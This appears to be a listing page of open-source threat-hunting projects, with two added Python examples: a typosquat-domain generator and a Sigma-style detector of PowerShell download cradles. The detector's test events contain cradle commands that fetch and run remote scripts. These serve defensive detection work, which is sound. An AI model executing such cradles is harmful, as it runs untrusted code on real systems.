threat-hunting

Top 23 threat-hunting Open-Source Projects

  1. MISP

    MISP (core software) - Open Source Threat Intelligence and Sharing Platform

    Project mention: TryHackMe: MISP | dev.to | 2025-04-25

    MISP (Malware Information Sharing Platform) is an open-source threat information platform that facilitates the collection, storage and distribution of threat intelligence and Indicators of Compromise (IOCs) related to malware, cyber attacks, financial fraud or any intelligence within a community of trusted members.

  2. Suricata

    Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.

    Project mention: What is a Denial of Service (DoS) Attack? A Comprehensive Guide | dev.to | 2025-04-28

    Suricata - High-performance Network IDS, IPS, and Network Security Monitoring engine.

  3. dnstwist

    Domain name permutation engine for detecting homograph phishing attacks, typosquatting, and brand impersonation

  4. sysmon-config

    Sysmon configuration file template with default high-quality event tracing

  5. ThreatHunter-Playbook

    A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

  6. awesome-threat-detection

    ✨ A curated list of awesome threat detection and hunting resources 🕵️‍♂️

  7. IntelOwl

    IntelOwl: manage your Threat Intelligence at scale

  8. HELK

    The Hunting ELK

  9. awesome-yara

    A curated list of awesome YARA rules, tools, and people.

  10. securityonion

    Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, detections, and case management. It also includes other tools such as osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, and Zeek.

  11. malwoverview

    Malwoverview is a first-response tool used for threat hunting that offers intel information from VirusTotal, Hybrid Analysis, URLhaus, PolySwarm, Malshare, AlienVault, Malpedia, MalwareBazaar, ThreatFox, Triage, InQuest, VxExchange and IPInfo; it is also able to scan Android devices against VT.

  12. chainsaw

    Rapidly Search and Hunt through Windows Forensic Artefacts

  13. sysmon-modular

    A repository of sysmon configuration modules

  14. signature-base

    YARA signature and IOC database for my scanners and tools

  15. hayabusa

    Hayabusa (隼) is a Sigma-based threat hunting and fast forensics timeline generator for Windows event logs.

  16. APT_REPORT

    Interesting APT Report Collection And Some Special IOC

  17. EVTX-ATTACK-SAMPLES

    Windows Events Attack Samples

  18. detection-rules

    Rules for Elastic Security's detection engine

    Project mention: Initial details about why the CrowdStrike's CSAgent.sys crashed | news.ycombinator.com | 2024-07-20

    [2] https://github.com/elastic/detection-rules

  19. yeti

    Your Everyday Threat Intelligence

  20. matano

    Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS

    Project mention: Matano: Open-source security data lake for cybersecurity analytics | news.ycombinator.com | 2025-04-03

  21. SysmonTools

    Utilities for Sysmon

  22. Hunting-Queries-Detection-Rules

    KQL queries: Defender for Endpoint and Azure Sentinel hunting and detection queries in KQL. Out-of-the-box KQL queries for Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.

  23. APT-Hunter

    APT-Hunter is a threat hunting tool for Windows event logs, built with a purple-team mindset, to detect APT movements hidden in the sea of Windows event logs and decrease the time needed to uncover suspicious activity.

NOTE: The open source projects on this list are ordered by number of GitHub stars. The number of mentions indicates repo mentions in the last 12 months or since we started tracking (Dec 2020).
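
The dnstwist entry above describes a domain name permutation engine. The Python below is an added illustration, not dnstwist's own code: it reimplements the core idea so the technique is visible, generating typosquat and homoglyph candidates for a brand domain (omission, transposition, repetition, replacement, homoglyph substitution, hyphenation and TLD swap) and then matching them against DNS query log lines. The homoglyph table, the TLD list and the log lines are constructed for this example; dnstwist itself additionally resolves candidates, checks MX records and compares page content, all of which is left out here.

```python
"""Domain permutation generator in the style of dnstwist (added example, not dnstwist's code)."""
import string

# Constructed subset of visually confusable substitutions (dnstwist ships a far larger table).
HOMOGLYPHS = {"o": ["0"], "l": ["1", "i"], "i": ["1", "l"], "e": ["3"],
              "a": ["4"], "s": ["5"], "m": ["rn"], "w": ["vv"]}
TLDS = ["com", "net", "org", "co", "io"]  # constructed; dnstwist uses a large TLD dictionary


def split_domain(domain):
    """'example.com' -> ('example', 'com'); a single label is enough for the demonstration."""
    name, _, tld = domain.lower().rpartition(".")
    return name, tld


def homoglyph(name):
    return {name[:i] + s + name[i + 1:]
            for i, ch in enumerate(name) for s in HOMOGLYPHS.get(ch, [])}


def omission(name):
    return {name[:i] + name[i + 1:] for i in range(len(name))}


def transposition(name):
    return {name[:i] + name[i + 1] + name[i] + name[i + 2:] for i in range(len(name) - 1)}


def repetition(name):
    return {name[:i] + name[i] + name[i:] for i in range(len(name))}


def replacement(name):
    return {name[:i] + c + name[i + 1:]
            for i in range(len(name)) for c in string.ascii_lowercase if c != name[i]}


def hyphenation(name):
    # start at 1 so no label begins or ends with '-', which would be an invalid hostname
    return {name[:i] + "-" + name[i:] for i in range(1, len(name))}


# Order matters: the first generator to produce a candidate labels it, so a
# homoglyph is reported as such rather than as a generic letter replacement.
GENERATORS = [("homoglyph", homoglyph), ("omission", omission),
              ("transposition", transposition), ("repetition", repetition),
              ("replacement", replacement), ("hyphenation", hyphenation)]


def permutations(domain):
    """Return {candidate_domain: technique} for every look-alike of `domain`."""
    name, tld = split_domain(domain)
    table = {}
    for kind, fn in GENERATORS:
        for cand in fn(name):
            if cand and cand != name:
                table.setdefault(f"{cand}.{tld}", kind)
    for t in TLDS:
        if t != tld:
            table.setdefault(f"{name}.{t}", "tld-swap")
    return table


# Constructed DNS query log lines; the 'query=' field is what we hunt on.
SAMPLE_DNS_LOG = """\
2025-04-25T10:00:01Z client=10.0.0.5 query=example.com
2025-04-25T10:00:02Z client=10.0.0.7 query=exarnple.com
2025-04-25T10:00:03Z client=10.0.0.9 query=github.com
2025-04-25T10:00:04Z client=10.0.0.5 query=examp1e.com
2025-04-25T10:00:05Z client=10.0.0.8 query=example.co
"""


def hunt(log_text, brand):
    """Return (queried_domain, technique) for each log line whose query is a look-alike of `brand`."""
    table = permutations(brand)
    hits = []
    for line in log_text.splitlines():
        if "query=" not in line:
            continue
        q = line.rsplit("query=", 1)[1].split()[0].lower().rstrip(".")
        if q in table:
            hits.append((q, table[q]))
    return hits


if __name__ == "__main__":
    for domain, kind in hunt(SAMPLE_DNS_LOG, "example.com"):
        print(f"{kind:<14} {domain}")
```

The generated table is the hunting artefact: feed it to a DNS resolver or passive-DNS source to find which candidates are actually registered, and match it against resolver or proxy logs as `hunt` does. Exact-match lookup keeps this cheap even with the full replacement set, which is the largest contributor (25 alternatives per character position).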

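Several entries above (hayabusa, chainsaw, ThreatHunter-Playbook, EVTX-ATTACK-SAMPLES) revolve around running Sigma-style detection logic over Windows event logs. The Python below is an added illustration, not code from Hayabusa or Chainsaw: it evaluates a Sigma-shaped rule (named selections with field modifiers, combined by a condition expression) over constructed Sysmon-like event records and returns the hits as a time-sorted timeline, which is the shape of output a tool like Hayabusa produces. The rule, the events, the field names and the allow-listed `updater.exe` parent are all constructed for the example; YAML parsing and logsource-to-channel mapping are left out.

```python
"""Sigma-style rule evaluation over Windows event records (added example, not Hayabusa/Chainsaw code)."""

# Constructed Sigma-style rule as a dict (a real rule is YAML with the same keys).
RULE = {
    "title": "PowerShell download cradle",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "EventID": 1,  # Sysmon process creation
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["downloadstring", "invoke-webrequest", "iwr "],
        },
        "filter": {"ParentImage|endswith": "\\updater.exe"},  # hypothetical allow-listed parent
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed Sysmon-like events (EventID 1 = process creation, 3 = network connection).
EVENTS = [
    {"TimeCreated": "2025-04-28T09:14:02Z", "EventID": 1, "Computer": "WS01",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.99/a.ps1')"},
    {"TimeCreated": "2025-04-28T09:10:44Z", "EventID": 1, "Computer": "WS02",
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "pwsh.exe -File C:\\scripts\\backup.ps1"},
    {"TimeCreated": "2025-04-28T09:12:30Z", "EventID": 1, "Computer": "WS03",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Program Files\\Vendor\\updater.exe",  # matches the filter selection
     "CommandLine": "powershell.exe -c Invoke-WebRequest http://intranet/agent.msi -OutFile agent.msi"},
    {"TimeCreated": "2025-04-28T09:11:00Z", "EventID": 1, "Computer": "WS04",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "powershell.exe -c \"iwr http://10.0.0.99/b.ps1 -UseBasicParsing | iex\""},
    {"TimeCreated": "2025-04-28T09:13:05Z", "EventID": 3, "Computer": "WS01",  # network event, no CommandLine
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "DestinationIp": "10.0.0.99"},
]


def field_matches(event, key, expected):
    """Apply Sigma modifiers (contains/startswith/endswith, |all) to one field, case-insensitively."""
    field, _, mods = key.partition("|")
    mods = mods.split("|") if mods else []
    if field not in event:
        return False
    actual = str(event[field]).lower()
    values = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]

    def one(v):
        if "contains" in mods:
            return v in actual
        if "startswith" in mods:
            return actual.startswith(v)
        if "endswith" in mods:
            return actual.endswith(v)
        return actual == v

    return all(map(one, values)) if "all" in mods else any(map(one, values))


def selection_matches(event, selection):
    """A selection is a map (every key must match) or a list of maps (any one map may match)."""
    if isinstance(selection, list):
        return any(selection_matches(event, m) for m in selection)
    return all(field_matches(event, k, v) for k, v in selection.items())


def eval_condition(cond, sels):
    """Evaluate e.g. 'a and not b or c' over selection results; precedence not > and > or."""
    tokens = cond.split()

    def parse_or(i):
        val, i = parse_and(i)
        while i < len(tokens) and tokens[i] == "or":
            rhs, i = parse_and(i + 1)
            val = val or rhs
        return val, i

    def parse_and(i):
        val, i = parse_not(i)
        while i < len(tokens) and tokens[i] == "and":
            rhs, i = parse_not(i + 1)
            val = val and rhs
        return val, i

    def parse_not(i):
        if tokens[i] == "not":
            val, i = parse_not(i + 1)
            return (not val), i
        return sels[tokens[i]], i + 1

    return parse_or(0)[0]


def match_rule(rule, event):
    det = rule["detection"]
    sels = {name: selection_matches(event, sel) for name, sel in det.items() if name != "condition"}
    return eval_condition(det["condition"], sels)


def build_timeline(rules, events):
    """Run every rule over every event and return the hits sorted by event time."""
    hits = [{"Timestamp": ev["TimeCreated"], "Computer": ev["Computer"], "Rule": r["title"],
             "Level": r["level"], "Details": ev.get("CommandLine", "")}
            for ev in events for r in rules if match_rule(r, ev)]
    return sorted(hits, key=lambda h: h["Timestamp"])


if __name__ == "__main__":
    for h in build_timeline([RULE], EVENTS):
        print(f"{h['Timestamp']}  {h['Level']:<5} {h['Computer']:<5} {h['Rule']}  | {h['Details']}")
```

The `filter` selection is the part worth attention in a hunt: it is where a rule's false-positive suppression lives, and an attacker who can launch from an allow-listed parent slips past it, so review filters as carefully as the positive selection when tuning rules from a shared repository.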
Index

What are some of the best open-source threat-hunting projects? This list will help you:

 #   Project                           Stars
 1   MISP                              5,697
 2   Suricata                          5,241
 3   dnstwist                          5,148
 4   sysmon-config                     5,004
 5   ThreatHunter-Playbook             4,207
 6   awesome-threat-detection          4,159
 7   IntelOwl                          4,120
 8   HELK                              3,830
 9   awesome-yara                      3,807
10   securityonion                     3,700
11   malwoverview                      3,193
12   chainsaw                          3,147
13   sysmon-modular                    2,775
14   signature-base                    2,621
15   hayabusa                          2,607
16   APT_REPORT                        2,555
17   EVTX-ATTACK-SAMPLES               2,340
18   detection-rules                   2,288
19   yeti                              1,849
20   matano                            1,556
21   SysmonTools                       1,520
22   Hunting-Queries-Detection-Rules   1,454
23   APT-Hunter                        1,336
